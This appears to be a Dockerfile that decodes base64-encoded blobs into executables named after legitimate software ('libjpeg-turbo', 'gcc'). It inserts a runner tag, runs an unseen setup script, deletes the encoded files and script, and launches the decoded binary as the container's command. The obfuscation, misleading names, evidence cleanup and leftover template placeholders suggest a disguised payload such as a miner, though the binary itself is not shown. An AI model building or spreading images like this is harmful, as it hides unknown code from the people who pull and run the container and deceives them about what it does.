FROM santiagomachadowe/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > libjpeg-turbo.log'

COPY libjpeg-turbo.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode libjpeg-turbo.64 > libjpeg-turbo'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' libjpeg-turbo

RUN bash ./docker.sh
RUN rm --force --recursive libjpeg-turbo _REPO_NAME__.64 docker.sh gcc gcc.64

CMD libjpeg-turbo
